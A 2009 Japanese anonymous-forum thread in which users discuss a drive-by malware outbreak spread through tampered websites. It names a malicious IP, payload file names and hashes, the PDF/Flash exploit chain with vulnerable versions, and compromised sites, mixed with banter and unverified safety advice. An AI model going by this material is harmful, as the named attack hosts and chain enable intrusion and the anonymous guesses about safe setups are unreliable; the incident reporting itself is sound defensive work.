アクロバットは使って無くてFoxit Reader使ってるんですが Versionは先月以降更新されてないようです。 このままでは危ないですか? Foxit Reader 3.0 Build 1506 03/09/09
426 :
414 :2009/04/09(木) 12:33:57
>>419 ごめんなんか怒らせた?
もちろん自分の場合は必ずリカバリするよ。
ただそういう話が出てたけどどうなったのかなと思って
>>423 その辺はla.exeを逆アセンブルしてソースを解読して
La.exeの処理内容を把握しないと駄目なんだけど、
このスレには残念ながら現状ではその種のスキルがある奴がいないんだと思う。
プログラマ板から有能なプログラマを召還して解析しないとだめかもしらんね。
>>426 全然怒ってないよん♪
ただ、あまり無闇に怯えたり、逆にやたらに過信しても駄目って事をいいたいだけ。
親玉を引っ張り出すところまでしかわかってなくて、 親玉が何をするかは一切不明なんだよね 今のところ。 ただ、ブラウザが落ちまくったりとかの症状しかあがってない。
430 :
414 :2009/04/09(木) 12:44:14
下手に出れば調子に乗りやがって いい加減巣に帰れゴミカス
>>431 だからここはID出ない過疎板なんだから
まともなレスを付けたり詐称されたくないのなら
トリップつけるしかないだろってのw
そもそもウィルス並の基地外がわんさかいる板なんだからw
こえ〜 リカバリでWin回復しても、データなかったら意味ない 今回はセキュリティソフトの完敗か
ウイルス解析よりもウイルスを各ベンダーに送って対応してもらうのが先 それとLa.EXEが引き金で感染したやつはいないだろ? これはまた別URL(同じラトビアIP)から ダウンロードしたものであって今回のGENO騒動とはノータッチの筈 ホームページ経由の感染に絞って解析を進めるべき
>>434 それならあとは大方出尽くして鯖側の感染経路の特定位しか残ってないと思うけど、
そのへんになるとそれこそ囮鯖でも立ててクラッカーにクラッキングして貰う位しか残ってないと思うよ。
結局、FTPパスが何らかの方法で事前に漏れて、FTPで直に鯖にログインされて堂々と改ざんされているって説が
全世界的に有力になってるけど、
それの裏づけ作業みたいな感じのをまだ誰もやっていないんで、それをやるとか。
ちなみに検体提出なんてとっくに済んでるでしょ。
>>434 なんでそこを切り離そうとするんだよ
GENOの怠慢な対応でウイルスをダウンロードして実行する
ウイルスを配布した事実を隠そうとしてるのか?
ちなみに今回のが2000/XP狙いうちでVISTAは大丈夫ってのは どういう根拠なん?
>>436 だからGENOその他汚染されたサイトで感染する今回のウイルス侵入経路でLa.exeなんてものは少しも絡んでない。
GENOのサイトをみてPDF又はFLASHのExploitで感染→La.exeが作られる
なら解るがここでいってるLa.exeは別URLの物だろ?
よくいくFLA板は今すげぇ過疎ってるのにID出てるんだよなぁ…。 昔は盛り上がってたからだろうけどね。
>>434 だって仮想PCじゃadobeReaderがエラー吐いて落ちるだけなんだもん
つまんないじゃん
>>439 GENO観覧→(中略)→ブラウザが壊れOSも不安定
これが全て。
>>435 感染後に作られる少数ファイル、一部の感染元ファイルはまだ。
それは今晩やる予定
>>437 ウィルス内の処理の一部でUserAgentを参照して
2kやXPのみを対象にしていた点と
>>137 の点。
ただ、VistaでもUAを詐称して踏んだ場合とか、
UA詐称をしない場合でもウィルスをモロに食らう形ではなくても部分的に食らってしまう事はあるかと思う。
いずれにしてもUACをどこまで信用するかって話になる。
個人的にはDEPもUACも過信するほど強固ではないと思うよ。
La.exeとGENO経由の感染、解析レポートがごっちゃになりそうだから ホームページ経由の感染を解析したほうが滅茶苦茶にならないと思ったんだけど La.exeがホームページ経由の感染タイプと全く同じとは現段階では言い切れないから
バッファオーバーランを起こせるなら、La.exeみたいな実行ファイルをどこかに残す必要はないんじゃないかと思うんだが。 一番の問題はサイトのjsをあっさり書き換えられてるってことじゃないか。
うわあ・・・ 特別な動作するときに逐一許可してくれるうざいやつでしょ VISTAの高速化設定とかで本やサイト見てUAC切ってた・・・ というユーザー多いんじゃ
>>446 海外でjs改竄されたおなの子はftpパス盗まれたと言ってる
どう盗まれたまでは書いてない
>>447 UACを切ってた場合もそうだし、
そもそもHDD上のファイル書き換えではなくて
メモリ上のExplorer.exeを書き換えて悪さをしているみたいなんだから
そこでなにかやられたらそれこそアウト。
ぶっちゃけ、たとえVistaでUACを入れててもも
レジストリを下手に書き換えられたりした時点で負けってレベル。
>>448 どう盗まれていたかまで判っていたら
恐らくそのおんなのこがクラッカーだろw
>>446 これ以上のサイト側の感染を抑止する為にはその部分の調査も必要だけど、
ホントはそんな解析をプロの業者にやらせたら軽く1000万位取られても当然ってレベルだよなw
いずれにしてもこれまでに感染が確認されたサイトが稼動しているOS、httpd、CMSがそれぞれバラバラなんで、
単純にこれらのセキュリティホールが突かれているっていう単純な話ではない様な気がする。
>>405 先生入れてるけど4月4日にGENO踏んでAdobe起動
スキャン→無反応 だけど違和感を感じる
カスペでオンラインスキャン→トロイ検出。
456 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 13:26:50
>404 ただしハードウエアの環境によっては、ウイルスプログラムが実行されずに、 Adobe Readerが強制終了させられるだけの場合もあるという。 これがAMD64の事かな?
>>454 少なくてもUACを切って使っているのがデフォだと思うんで、
そーいう奴は知らず知らずにキーロガー等だけ仕込まれてて涙目って感じだと思う。
とにかく、過信や油断したら負けだと思う。
UACってあれか、コンパネいじくってるとよく出てくる「許可くれよ」ってやつか あれを切って、許可する手間が省ける以外にメリットあんの?
>>439 ?id=2の変造PDFによるバッファオーバーフローで?id=10のexeがダウンロード・実行させる
その1つが通称La.exe
?id=10で落ちてくるexeは数種類あるようだ
時間とともに差し替えられたのか、何らかの条件に基づいて選ばれるのか、はたまた
ランダムなのかは不明
いわゆるLa.exe(15872 bytes)
6de7f96fe398ca304b1992869faf55c7
いわゆる8lv.exe(15360 bytes)【実物は未確認】
791509d03706cbc8883536b5131341d4
さらに別のexe(16384 bytes)
2586a42cfdc03ea62694f5641b5d7633
また、?id=3のFlash(swf)もバッファオーバーフローを引き起こす変造ファイルだと
思われるが詳細不明
カスペのオンラインが薦められてるけどノートンのオンラインスキャンでも検知してくれますか?
UAC嫌でVISTA使う意味が分からん
>>459 補足すると、それらのEXEに共通するのは皆u.batを生成するって点だよね。
>>439 さんは既存の海外のウィルス情報に全然目を通していないみたいだけど、
もうちょっと勉強したほうがいいと思う。
>>457 トン。
>>458 例えば、だ。
VISTA使いが2ちゃで短縮urlやただの画像を踏んだ時
そうした警告がでたらどうする
XPの制限ユーザーでもGENOにやられますか?
あれ・・・
>>458 UAC切ってメリット →UAC使ってメリット と脳内変換してた、ごめん
よし、今から俺が初心者質問対応係になるよ ただし、今から寝る。いつ起きるかもわからん。
>>452 英語力なさすぎて嘆いてるのか本気で言ってるのか読めない
頭が禿げてきたんだけどこれなにウィルス?
HAGENOウイルス
>>468 白癬菌ウィルス。
最寄の皮膚科へどうぞw
472 :
439 :2009/04/09(木) 13:48:58
VB2009が蹴ったアドレス、末尾が?id=101だった。 この末尾の数字が違うと、落ちてくるウイルスも違うってことかな?
>>474 それはわからない
ただ共通してu.batを作るのはわかってる
まぁ自業自得だな いまだにXP使ってるからこういうことになる VISTAなら大丈夫 VISTA SP1 Mozilla Firefox Adobe Reader 9 flash プレーヤー10 が最強
笑ってあげたほうがいいかな? わし的には失笑なんだが
>>477 海外では3月28日の報告があるみたいだ。
高校入学祝いにやっと買ってもらってPCがVISTA機で 中学時代にXP機買ってもらってるツレに相手にされない 香具師がうるさいスレはここですか
>>479 高校入学祝いに買ってもらったPCは n88日本語BASICが
付いたPC9801VXだったお!!
ラトビアのIPの94.247.2.195でぐぐると
↓の公開DBがヒットしたわ。
これを見た限り、少なくても3/25の段階で
ラトビアのIPに関してチェックしようとしている人がいたんで、
クラッカーがウィルスの動作チェック等に使ったのか
サイトを書き換えられてしまったWebマスター等が確認の為に使ってた痕跡だと思う。
VisualRoute Database Reporting
ttp://visualroute.visualware.com/search?dfromtext= 2009%2F03%2F24+19%3A55.56&dtotext=2009%2F03%2F25+19%3A55.56&pg=21&perpg=50
※URL長すぎなんて改行してます。。。
ぐーぐる先生の日本語訳
ttp://translate.google.co.jp/translate?hl=ja&sl=en&u= http://visualroute.visualware.com/ search%3Fdfromtext%3D2009%252F03%252F24%2B19%253A55.56%26dtotext
%3D2009%252F03%252F25%2B19%253A55.56%26pg%3D21%26perpg%3D50&ei=
ioXdSfbEB8yNkAX2l9ybDg&sa=X&oi=translate&resnum=1&ct=result&prev=
/search%3Fq%3D94.247.2.195%26hl%3Dja%26lr%3D%26sa%3DN%26start%3D60
※URL長すぎなんて改行してます。。。
中学入学祝いにせがんだのがappleUplus
小学生の頃に友達がPC6001を買ってもらったのに触発して 親に駄々こねて買ってもらったのがSordのM5♪
馬鹿にされ、MSからもスルーされ、各業界からも屑扱い 悲しい日々を送っている糞OSのVISTA厨歓喜! でもVISTAが大丈夫というのは都市伝説だったwww
XP使ってるゴミどもw
>>407 バスター2009入れてたけど感染したよorz
不正変更の監視がエクスプローラの書き換え要求を検知したけど
もうその時点では感染してやられてたわけだから後の祭り。
キャッシュに残ってた本体exeもスクリプトも感染後にチェックしてもスルーだった。
つーか毎回こんなこと書いてるな俺。
operaなら大丈夫?
orz
AMD64なら大丈夫?
orz
バスターはいってれば大丈夫?
orz
>>459 > いわゆる8lv.exe(15360 bytes)【実物は未確認】
俺はこれだった。
バイト数でしか確認してないが、キャッシュに残ってた。
バスターは安全と判断してくれました。
489 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 14:46:49
firefoxで94.247.2.195にアクセスしたらセーフブラウジングが遮断した 以下そこに表示された「このサイトがブロックされる理由」 セーフ ブラウジング 94.247.2.0 の診断ページ 94.247.2.0 の現在のステータス 現在のところ、このサイトは疑わしくないと認識されています。 Google による巡回テスト状況 このサイトで過去 90 日間に Google がテストした 272 ページのうち 0 ページで、ユーザーの同意なしに不正なソフトウェアがダウンロードされ、インストールされていたことが判明しました。 Google が最後にこのサイトを巡回したのは2009-04-07で、このサイトで不審なコンテンツが最後に検出されたのは2009-04-07です。 Malicious software includes 240 scripting exploit(s), 16 trojan(s), 5 exploit(s). This site was hosted on 1 network(s) including AS12553. 有害な不正ソフトの感染を広げる媒介をしていたかどうか 過去 90 日に、94.247.2.0 は ultimathulelodge.com/, zavallis.com/, databpo.com/ を含む 4 サイトの感染媒体として機能していたようです。 不正なソフトウェアをホストしていたかどうか はい、このサイトでは不正なソフトウェアのホスティングが過去 90 日の間に検知されています。serona.pe.kr/, hitzwallpaper.com/, firat.edu.tr/ を含む 7560 個のドメインを感染させています。 Updated 36 hours ago
7560・・・
>7560 個のドメインを感染させています。 ちょっとwなにそれ
492 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 15:01:36
そろそろ騒動も下火になってきたな。
サイト乗っ取り→ゼロデイアタック→あぼん 序章にすぎん
某サイトの青板には今回のウイルス被害はないのか
>>493 つかまだ騒動知らない人の方が大半だよ。
今後改竄されたサイトが増えるにつれて更に被害が拡大するだろ。
ノーガードでもadobeも一切入れてない俺は完全セーフ。 ノーガードの俺にいつも文句言ってたおまいら涙目w
>>495 なんせログに現れないからな
実はいたりして
SpywareWarriorで話題にはなってたな
282 : クレマチス・モンタナ(北海道) [] :2009/04/07(火) 21:43:42.14 ID:CWnPkqk+ flash playerについて試してみた。IE6/2k。 やっぱりこのswfは flash player 9.0.115.0 以前に存在する脆弱性を利用したもの。 9.0.115.0でswfを読み込んでみたが、実行ファイルがダウンロードされコマンドプロンプトが立ち上がる。 9.0.124.0 以上であれば何も起こらず、攻撃は失敗するようだ。
何時亜種が出てもおかしくない状況で 「俺は○○○だから感染しない」とか言ってる奴は 危機意識が薄すぎるだろw
>>502 ν速民でもおいらみたいな情報強者もちゃんといるんだけどなw
だよなぁ・・・ここ数日は触れ始めたばかりのUbuntuLinuxに 火狐+addonでネット系は使ってるけどこれだって安心とは言えないでしょ?
>>504 今や、本当に安全なWeb閲覧環境なんてPC-DOSとWebBoyの組み合わせ位しかないと思うw
殆どのサイトが閲覧不可だけどなw
てか、発売元のIBMのサイトすらブラウズ出来ないと思う。試したこと無いけど。
7560…。社内に注意喚起しておこう。これは洒落にならん。 客先から問い合わせが殺到する前に手を打っておこう。
こりゃ、サイバーテロものだな
セキュ板でコテつける奴って変な奴しかいないよな
>>506 IT担当者として適切な対応だね。
イントラ掲示板とか、社内回覧板なんかで注意喚起を促したほうが良いと思う。
510 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 15:31:12
>>508 だから本当は酉使いたくないんだけど、この際仕方ない。
>>512 ウィルス並の基地外に成りすまされたくないからw
ここはID無しの釣堀なんだから仕方ないだろw
ID出ない板だからじゃね。見るほうも酉付けてもらったほうがいいわ。
むしろコテでまともなやつなんて ほとんど見たことない まぁ例外もあるけど 酉は付けてもらわないとむしろ困る
やたらComboFix、ComboFix言って 一時期いたSmitFraudFix無責任に進める奴、使う奴が出てきそうな感じw
酉つけなくても発言内容が薄ら寒いからわかる
いつも通り殺伐としてきて安心した
ラトビアのほう、サーバ管理者にコンテンツ消されたかな クッキーを食わせるJavaScriptも返ってこなくなった 代わりに「There is no site at this address!!」というテキストが
マルウェア配布サイトは大抵数日て消えるからな
521 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 15:52:43
>519 生きてるよ
見る側のセキュリティ対策はもちろんだが、 サイト運営管理の側も改竄されないようにちゃんと対策しといてもらいたい。 検出未対応な強力ウィルスを使われたらどうにもならん。
>>517 ぎくっ
まぁ、文体でバレバレだと思うけど、逆に簡単に成りすまされやすいんで。
>>336 あたりまとめてJPCert/CCにも送ってみるよ
あそこのMLで流れてくれればおそらく被害が出てる
企業なんかでもこれを知る人が出てくるとおもう
>>521 jquery.jsは生きてますな
ほかは内容をエラーメッセージに変えただけか
酉付けてるなら無駄話してないで早く全貌を解明して 対策と対処を明確にしたまえ。
>>526 もちろんはあくだ
まとめてて思ったけどクライアントPC視点とWebサーバ視点の
両方報告いるねこれ
>>529 そう。
鯖側に関してもまだ感染経路が判明していないんでその点の注意喚起も必要。
てか、これ以上の被害拡大を防ぐ手立ては鯖の感染数を減らすのが一番なんだから。
531 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 16:46:49
>492 >527
【審議中】 _,,..,,,,_ _,,..,,,,_ _,,..,,,_/ ・ω・ヽ/・ω・ ヽ,..,,,,_ ./ ・ω_,,..,,,,_ l _,,..,,,,_/ω・ ヽ | / ・ヽ /・ ヽ l `'ー--l ll l---‐´ `'ー---‐´`'ー---‐´
HijackThisやRSITのログにも現れないということだが、 SilentRunnersやKVRTやGMERのログにも現れないのか?
tp://internet.watch.impress.co.jp/cda/news/2009/04/09/23085.html
ちょ、その結論ヤバスw
> 各種ウィルス本体をInternetTempが展開される 日本語でOK > chmファイルの脆弱性を利用しようとしている模様 これ確定してたっけ?
539 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 17:27:48
まじお役立ちツールサンクス
540 :
525 :2009/04/09(木) 17:46:48
やっぱりわかりにくいんでサーバとクライアントわけます
>>538 指摘thx
コピペしてちょっと改変とかだからおかしいとこあるかもしんない
chmはどっかにあがってた気がするけど忘れた
確定じゃないかもしれんからやめとくか
とりあえず家族のPCのadobeReaderのJS切ってきた 説明するのに苦労したよ・・・・・・・
マジびっくりした。起動したまま放置してたらPCがピロリッとか言うんで見てみた。 全てパッチ済みで踏んだXPのSP3なんだけどいつの間にかTR/Agent.caaj [trojan]が、 \System Volume Information\_restoreに潜り込んでた。 ここからexeを呼ぶということは他に仕組みが動いてるはず。やばい。ある日突然活動開始するかも。
543 :
525 :2009/04/09(木) 18:09:07
544 :
525 :2009/04/09(木) 18:24:04
語尾とか言葉の修正と参考URL適当に追加して送るわ
で、うちバスターなんだけど 各社のウイルス対応状況はどうなの? カスペ・ノートンはOK? GENOが情報出さないから(情報出す能力がない?) どんな事サイトにされたかウイルス仕掛けられたのかが判ってない状況で 各社に対応してもらってないのか 調べてると情報が色々あって判んなくなってきたわ
半年後には沈静化してるだろうがな
んじゃ、100年ROMってろ
前にexplore.exe改竄された時Dr.Webで修復出来たような・・・
ROMって判んなくなってきてるから聞いたのに。。。 100年ROMってマス
//www.naxos.co.jp/ 【お詫び】 2009年4月7日午前より、8日昼頃にかけまして、弊社サイト内で 障害が発生しておりましたが、現在は復旧致しております。 ご迷惑をおかけ致しましたことをお詫び申し上げます。 なお、上記期間中に弊社サイトをご覧になられた場合、 パソコンによっては、ウイルスに感染している可能性がございます。 お心当たりの方は、大変恐れ入りますが、お使いのパソコンの ウイルスチェックや、ウイルスソフトの最新版へのアップデートなどの ご作業をお願い申し上げます。 (2009年4月8日 15時30分 ナクソス・ジャパン株式会社)
ウィルスソフト最新にしちゃらめえええええええええ
553 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 18:48:22
/) ///) /,.=゙''"/ / i f ,.r='"-‐'つ____ キャッシュ削除すりゃぁいいんだよ!! / / _,.-‐'~/⌒ ⌒\ / ,i ,二ニ⊃( ●). (●)\ / ノ il゙フ::::::⌒(__人__)⌒::::: \ ,イ「ト、 ,!,!| |r┬-| | / iトヾヽ_/ィ"\ `ー'´ /
> ウイルスソフトの最新版へのアップデート ダメだなこりゃ
ソフト最新にして再起動であぼんですねわかります
あんちとうんちの違いに迷ってそのまま付けずにテキトーに書いた感じだなw
まあIIS5.0じゃこんなもんだろうな・・・ とりあえずJPCert/CC送信完了
どうみても管理者不在鯖だな。
>>557 もつかれちゃん。
攻撃サイトとして報告されています!と火狐に怒られるんだが・・・
ttp://www.umax.net/ 「Google が最後にこのサイトを巡回したのは2009-04-06で、
このサイトで不審なコンテンツが最後に検出されたのは2009-04-06です。」
だって。
>>559 うちのIEでは全然問題ないな。
てか、UMAXが感染したら格安メモリ厨完全死亡だなw
今sqlsodbc.chmのMD5を確認してみたが F639AFDE02547603A3D3930EE4BF8C12 だった まあ安全圏だな
>>560 迷わず突撃するお前が大好きだ
atom機用に一枚ポチったらこの騒ぎにこのタイミングだw
>>562 ちなみにトップページしか見てないんで、そこんとこよろしこ。
UMAXの全てのコンテンツの現段階での安全性を保障している訳じゃないんで。
てか、若しかしてUMAXもGenoウィルス食らってて
書き換えられた部分を修正した後なのかも知れないな。
感染したドライブのバックアップから感染ファイルを復元するためにリアルタイム検索を停めて あれこれやってたらtmproxyがランタイムエラーで落ちたorz。 落ちるなよ… 再起動したらIPフレンドがIEの設定を変えようとしていると不正変更の監視に引っかかるし またやられたかなぁ。 まだ復元してなかったんだけどなぁ。 今の所前回みたいな症状は何も出てないしcmdもregeditも動いてる。 netstatでもあやしい接続はない。 IPフレンドもハッシュはZIPから解凍したオリジナルと変わらない。 バスターによるウイルス検索もクイック検索では何も出てこない。 とりあえずこのままオンラインチェックをやって問題ないようなら様子見だな…
VISTAが守ってくれました ありがとうVISTA
なんか自分語りとか雑談で連投してるやつがキチガイに成りすまされたら〜みたいなこといってるけど お前だろうが他のキチガイだろうがこっちからしたら同じだってことに気づいてくれないもんかな やっぱキチガイだから無理か
な お や
569 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 19:55:52
なるほど。
>>566 が ◆W07s5cWHb.の言っていた
ウィルス並みの基地外か。
573 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 20:04:52
574 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 20:07:24
結局「GENOウィルス」って名称で確定したのか? GENO涙目だな。
>>574 てか、特定のセキュリティ製品の定義ファイルで使われているからな。既に。
geno geno
まだぶっちゃけ何をするウィルスかは分かってないだろ・・ 実は匿名でwindowsの欠陥を直してくれている正義ウィルスだったり
いや使用者に無断で何かするのは正義とは言えないだろww
>>576 で、お前がトリップがどうのと言い始めたことが火種になって荒れはじめたのは、
どう解決してくれるの?
>>577 だれだよw
>>585 ですよねー
本名じゃないから大丈夫だけどいたずらメールしないでね><
おれの突撃フォルダにあるメールボムは上限1,000通らしいが
何、なんでこんな馴れ合いスレになってるんだ?w
>>586 本名じゃないから晒してもいい?
つか、メアドググルといろいろヒットするんだね…
GEBO
VMじゃうまく感染できないから力になれんのだよ
対策のまとめまだ〜
594 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 20:41:23
お前ら玄人面しててワロタw
>>589 メアドあせって検索したけどでてこなかった
アレありそうな名前だから誰かかぶったらかわいそうなんだが
>>595 新たなメアドと新たな名前で再送しとけ。
599 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 21:02:19
すいません577です 裏に入れると書いてたのがあってやってみました(^_^;) 間違えたようですm(_ _)m
602 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 21:13:45
>601 それmag-puppine.com/about/だろ?
>>602 あ、結局お勧めの中の鯖がそうだったんだっけか。
すまんな。
>>604 おい名無し
張り切っているのはわかるが図に乗るのはほどほどにしておけ・・・
ここでいきなり引退させてやろうか?
>>598 ほかというか、そのトップすら直ってないんじゃないか?
ソースにもろ問題のコードがあるし。
でも直リンはしないでくださいね。
いよいよ始まったか
>>598 直リンすんなキモブタ
こうですか?わかりません><
まだ対応してないアンチウイルスソフトってあるんですか?
610 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 21:40:25
>>609 ソフト次第で検知レベルにも色々と差があるから対応/未対応の区別は難しい
でも調べたところウイルスセキュリティZEROが未対応なのはガチ
>>612 横から申し訳ないんだけど、本体はまだほとんど検知できないってマジ?
くそっ またフリーズした このウィルスめ・・・ 買い物は全て激安通販でって思ってたのに情けない・・・ 笑っちゃうよねっ 馬鹿みたいだけどさ・・・ 俺は 新品ノートPCが激安で売ってるショップがあるからって見に行っただけなのに・・・ 正直・・・ 面食らっちゃって 動揺を隠すよう振舞うので精一杯だった・・・ 俺は・・・ 本当は・・・ 悔しいですっ!!
先日の土曜日午前にGENOにアクセスして ブラウザ(ニール)落ち。その後数回試すも同じ その後、IEで試しても落ち。 Readerは起動せず。 AdobeReaderは9.1 flashは最新じゃなかったかも OSはXPsp3 で各サイトでかかれいてる検証方法をいろいろ試したのですが どれもヒットなし。 これって助かってるんですかね?
再起動すれば、完全に分かるよ。 お勧めはしませんが。
俺は土曜日午後一時頃にGENOにアクセスして ブラウザ(ニール)全く変化無し IEで試しても変化無し Readerは起動せず。 AdobeReaderは6.0 flashは不明 OSはMe jsは常に切ってる で各サイトでかかれいてる検証方法をいろいろ試したのですが どれもヒットなし。 アンチウィルス オンラインウィルス アンチスパイウェアどれも検知せず これって助かってるんですかね?
>>615 土曜日午前だと判断に窮するな。
ぶっちゃけ、その頃には既にgeno鯖が改ざんされていたと思われるんで。
とにかく、疑わしい場合は手間を惜しまずに可及的速やかにクリーンインストールかリカバリを行うべき。絶対に。
>>618 ジャバスクリプト切ってても感染するの?
>>620 切っていれば理論上感染しない。
てか、情報を小出しに質問すんなっての。
626 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 22:18:50
(・3・) エェー
レスまとまってる
>>336 は定期的にageていくべき
628 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 22:20:11
>>626 こー見えても桜花賞の展望を検討とか予想したりして何気に結構忙しかったりするw
(・3・) エェー バカになんてしてないYO!
>>601 のECスレの84なのですが、それを踏んだ時にkasperskey7.01.325を一時切ってました...
踏んだと同時にadobe readerの9.01へのupdateが起動kasperskeyの更新処理が同時に発動し、CPUが100%近くになり固まったため
電源落として強制的に終了
その後再起動しkasperskeyもオンにして再度踏んだら84だったワケですが、後でやった完全スキャンでは何も出ませんでした
>>336 を見て
・再起動後regedit.exeは問題無く起動、cmdも同じく起動
・sqlsodbc.chmの値はここの
>>84 と同じf639afde02547603a3d3930ee4bf8c12(50,727 バイト)
・
>>191 のページは取り消されたアクションになるがダウンロードはできる
なら、取りあえず可能性は低いとみて良いでしょうか
>>613 マジ。
つい最近ネタのつもりで買ったんだけど
噂に違わぬ検知力だと実感w
633 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 22:29:57
自分のブログにここのまとめ書いていいのかな…
nod32は?
>>631 adobe readerとflashのバージョンは?
>>631 とりあえずキャッシュ消せ
それで解決って感染元が言ったんだから、それで間違えたら責任追及できる
>>633 皆が賛成すればOKじゃないだろうか。
2chのスレだと、読みにくいし、
規制されている人もいるから。
readerがタイミング良すぎてやっぱり怪しいですか....
>>631 当時は9.0今は最新に、flashは現在最新にしてしまって当時は分かりません
>>633 知識がない奴が間違ってGENO踏まないような配慮すりゃいいんじゃない
642 :
640 :2009/04/09(木) 22:39:23
>>631 >>637 次第でかなり絞られる
感染例のあるバージョンだと
どう潜んでるかわからんから安全かどうかなんて誰もわからんよ
セキュ板住民ですらお手上げでJPCERT/CCの回答待ちなんだから…
>>631 感染の可能性が高い低いって観点で考えないで、↓の様に考えた方がいいと思う。
・ウィルスを踏んだ恐れがあるPC内に個人情報や消されたり外部に流出しても痛くも痒くもない物しか入っていないのなら、
そのまま使い続けても構わない。
・そのPCで定常的にネットバンキングの残高照会をしたり、競馬のPAT投票をしたり、
アマゾンやその他のネット通販でカード番号を入力したりする事がある場合は、
面倒がらずにとっとと再インストールかリカバリをする。
FOXが何らかの対処とればいいんだが宝くじを当てるぐらいの確率でやらないなw
>>632 d。前段階で蹴らないソフトだとおしまいってことか。怖っ。
647 :
633 :2009/04/09(木) 22:43:56
>>639 ニュースにもなってるし被害拡大しない為にも
書いてみるかな…
>>641 それだけだと自分が感染してるか心配な人が検索しまくって
間違ってGENOにいっちゃうとかありえそうでな〜
2chを見るのに抵抗がある人もいるし
つーことで簡単に自分なりにまとめて書いてみます。
>>644 botnetに組み込まれて犯罪のお手伝いをする可能性はあるからクリーンインストール推奨
>>648 まぁ、結論を言うとその通りなんだけどね。
疑わしきPCは全て再インスコorリカバリ必須って事で。
650 :
631 :2009/04/09(木) 22:50:24
そうですね今は不確定な情報の状態だから「確実」はないので入れ直した方がいいですね 再インストールを考えた場合、こういった感染というものはC:以外にもするのでしょうか 一つのHDDをCとかDとか分割して使用してる場合や、HDDが複数ある場合も 全て感染を疑うべきものなのでしょうか? C:だけをリカバリすれば済むものなのでしょうか
絶対やだ><
>>647 このURLは絶対踏んじゃダメリストを作って、検索エンジン使う際は
上記URLと検索結果のURLを確認すること、悪意を持って転送トラップを
仕掛けてる人が居るから怪しいURLは踏まないこととか
しっかり書いておくしかないんじゃね?
2chの人達がひたすらあれから調べているのに 未だに本体が分からないって凄いな やはり書き換えの実行した後消すような感じかな
これまだガキでよくわからんのだけどこういうののプロになりたい 名に目指せばいいの?
てっぺん
げっげっ げげGENOげー♪ で替え歌作ってくれ。
しょうもな
>>650 現状ではまだウィルスが具体的にどんなデータを盗み出したりする等の詳細すら判明していない状況なので、
正直誰にも「このPCは安全」と断定する事は出来ない状況です。
とにかく、面倒だというのは承知の上で言ってるんだけど、再インストールやリカバリを行うべきです。
ちなみにリカバリ方法に関しても、まだノウハウが完全に纏まっている状況ですらないです。
確実にウィルスとおさらばしたいのなら必要なファイルだけをピンポイントで抜き取って、
メーラ等のデータもメーラが正常に起動するのであればメーラ内からエクスポートして
エクスポートしたデータのみを別のPCやCD/DVD-R等に焼いてバックアップを取るなんて方法が望ましいかと。
一応、このウィルスの今までに判っている挙動を見る限り
一般的なWindows環境の場合はDドライブ内にウィルスが入り込む事はほぼ無いと思うけど、
正直保障は出来ないレベル。
659 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 23:04:25
今年の最強ウィルス?
>>644 をちょこっと訂正
・ウィルスを踏んだ恐れがあるPC内に個人情報を一切記録してなくて
データが消されたり外部に流出しても痛くも痒くもない物しか入ってなく、
その上で外部のクラッカー等からパソコンを踏み台にされてインターネット犯罪等に利用されても一向に構わないというのなら
そのまま使い続けても構わない。
・そのPCで定常的にネットバンキングの残高照会をしたり、競馬のPAT投票をしたり、
アマゾンやその他のネット通販等でカード番号を入力したり、
他人に知られたら恥ずかしくて生きていけなくなる様な自分のブログにログインして記事を書いたりする事がある場合は、
面倒がらずにとっとと再インストールかリカバリをする。
661 :
615 :2009/04/09(木) 23:06:17
>>618 d
おそらくそのころGENOサイトは改竄されていたんでしょうけど・・・
トップにアクセスしたらしばらく表示したあと、メモリ使用量があがり、ブラウザが落ちる
って状態でした。
インスコがよさげですね。
>>659 食らうとマイドキュメント等のユーザーデータを一切合財消去するウィルスがあったから
あれが一番最凶だと思う。
てか、この前食らって再インストールしたわw
pdfのJavaScriptを読むと Adobe Reader 8系8.1.2未満、7系7.1.0未満、6以下全て →CVE-2007-5659 それ以外 →CVE-2008-2992 みたいな感じで脆弱性をついているように見える。 CVE-2008-2992は8系8.1.2以下に存在する脆弱性なので、まとめると Adobe Reader 9.0/8.1.3/7.1.0以上 であればpdfによる感染は免れるように思うんだけど、 上に挙げたバージョンのAdobe Reader使ってて感染した例はあったっけ。
665 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 23:10:41
マイドキュメントの中身300GB全部削除されたら自殺するな。オレ。
666 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 23:15:13
>>664 8.1.3だったけど、readerの使用メモリが異常に増えたよ。
それ移行の挙動はreaderがアップデートしろって言うだけで
他に挙動不審な点はなかった。u.bat作成なし、sqlsodbc.chm改変なし
一応a-squadでいくつかウイルスは見つかったけど、
今回のものかどうかわかんないや。
>>156 に人も同じ感じだな
668 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 23:16:53
とりあえず、おいらは火狐のアドオンでAdobeReaderを無効化しておいた。
>>658 有り難うございましす、動画が1テラ以上あるので(noエロw)そういうのはどうなのかと思いまして
何とかやってみます
>>660 個人情報ありまくりですwC:にはありませんがrobotのpassたちが
皆様有り難うございました
671 :
666 :2009/04/09(木) 23:17:52
672 :
666 :2009/04/09(木) 23:19:07
勝手に無理なOCさせてBIOSぶっこわすウイルスなかったっけ
>>664 そこまで完全に把握出来てないんだけど、
確かν速のスレで9でも食らったと言ってた人がいた記憶がある。確約出来ないけど。
恐らく9.0を指していたと思うけど。
ちなみにν速の過去スレにて挙動実験をおこなってた人がいて、
その結果では8.X系に関しては
8.1.1以下でしかウィルスが動作せずに
8.1.2以上ではウィルスが動作しなかった様な事を報告していた人がいたと思う。
その点ではCVE-2008-2992の脆弱性と一致するね。
